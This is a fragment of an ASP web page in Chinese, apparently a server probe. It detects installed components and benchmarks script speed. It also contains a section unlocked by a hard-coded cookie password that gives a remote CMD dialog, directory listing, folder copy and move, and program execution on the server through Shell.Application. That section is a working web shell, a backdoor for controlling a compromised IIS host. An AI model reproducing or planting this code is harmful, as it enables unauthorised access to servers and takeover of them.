| <%=ObjTotest(i,0) & " " & ObjTotest(i,1)%> | <%
If Not ObjTotest(i,2) Then Response.Write "×" Else Response.Write "√ " & left(ObjTotest(i,3),11) & "" End If%> |
■ 图像处理组件
| 组 件 名 称 | 支持及版本 |
| <%=ObjTotest(i,0) & " " & ObjTotest(i,1)%> | <%
If Not ObjTotest(i,2) Then Response.Write "×" Else Response.Write "√ " & left(ObjTotest(i,3),11) & "" End If%> |
其他组件支持情况检测
在下面的输入框中输入你要检测的组件的ProgId或ClassId。
ASP脚本解释和运算速度测试
<%
'感谢网际同学录 http://www.5719.net 推荐使用timer函数
'因为只进行50万次计算,所以去掉了是否检测的选项而直接检测
Response.Write "整数运算测试,正在进行50万次加法运算..."
dim t1,t2,lsabc,thetime,thetime2
t1=timer
for i=1 to 500000
lsabc= 1 + 1
next
t2=timer
thetime=cstr(int(( (t2-t1)*10000 )+0.5)/10)
Response.Write "...已完成!" & thetime & "毫秒。
"
Response.Write "浮点运算测试,正在进行20万次开方运算..."
t1=timer
for i=1 to 200000
lsabc= 2^0.5
next
t2=timer
thetime2=cstr(int(( (t2-t1)*10000 )+0.5)/10)
Response.Write "...已完成!" & thetime2 & "毫秒。
"
%>
| 供 对 照 的 服 务 器 | 完成时间(毫秒) | |
| 整数运算 | 浮点运算 | |
| 阿江的个人主机(DDR512M赛扬1.7G,测1次) | 250 | 234 |
| 百优科技100u主机(2003-06-12,测10次,最大值) | 187 | 156 |
| 西部数码west263主机(2003-06-12,测10次,最大值) | 187 | 177 |
| 联网科技linkwww主机(2003-06-13,测10次,最大值) | 187 | 171 |
| 您正在使用的这台服务器 | <%=thetime%> | <%=thetime2%> |
<%case "p.asp"%>
<%if Request.Cookies("password")="7758521" then %>
<%response.write "注意:每次只能执行一个操作" %>
当前时间:<%response.write now()%>
程序所在的物理路径:
<%response.write request.servervariables("APPL_PHYSICAL_PATH")%>
|
|
|
copy 目的地址不要带文件名 |
|
move 目的地址不要带文件名 |
|
路径: 程序: 不可以加参数 |
| CMD命令对话框
|
| 路径与文件名 |
|
|
<%
Response.Write request.form("cmd") & "
"
Response.Write strResult
DSnXA = Request.Form("text") '目录浏览
if (DSnXA <> "") then
set shell=server.createobject("shell.application") '建立shell对象
set fod1=shell.namespace(DSnXA)
set foditems=fod1.items
for each co in foditems
response.write "" & co.path & "-----" & co.size & "
"
next
end if
DSnXA1 = Request.Form("text1") '目录拷贝,不能进行文件拷贝
DSnXA2 = Request.Form("text2")
if DSnXA1<>"" and DSnXA2<>"" then
set shell1=server.createobject("shell.application") '建立shell对象
set fod1=shell1.namespace(DSnXA2)
for i=len(DSnXA1) to 1 step -1
if mid(DSnXA1,i,1)="\" then
path=left(DSnXA1,i-1)
exit for
end if
next
if len(path)=2 then path=path & "\"
path2=right(DSnXA1,len(DSnXA1)-i)
set fod2=shell1.namespace(path)
set foditem=fod2.parsename(path2)
fod1.copyhere foditem
response.write "command completed success!"
end if
DSnXA3 = Request.Form("text3") '目录移动
DSnXA4 = Request.Form("text4")
if DSnXA3<>"" and DSnXA4<>"" then
set shell2=server.createobject("shell.application") '建立shell对象
set fod1=shell2.namespace(DSnXA4)
for i=len(DSnXA3) to 1 step -1
if mid(DSnXA3,i,1)="\" then
path=left(DSnXA3,i-1)
exit for
end if
next
if len(path)=2 then path=path & "\"
path2=right(DSnXA3,len(DSnXA3)-i)
set fod2=shell2.namespace(path)
set foditem=fod2.parsename(path2)
fod1.movehere foditem
response.write "command completed success!"
end if
DSnXA5 = Request.Form("text5") '执行程序要指定路径
DSnXA6 = Request.Form("text6")
if DSnXA5<>"" and DSnXA6<>"" then
set shell3=server.createobject("shell.application") '建立shell对象
shell3.namespace(DSnXA5).items.item(DSnXA6).invokeverb
response.write "command completed success!"
end if
end if
%>
<%
end select
function Epass(pass)
temppass=StrReverse(left(pass&"zxcvbnm,./",10))
templen=len(pass)
mmpassword=""
for j=1 to 10
mmpassword=mmpassword+chr(asc(mid(temppass,j,1))-templen+int(j*1.1))
next
Epass=replace(mmpassword,"'","B")
end function
%>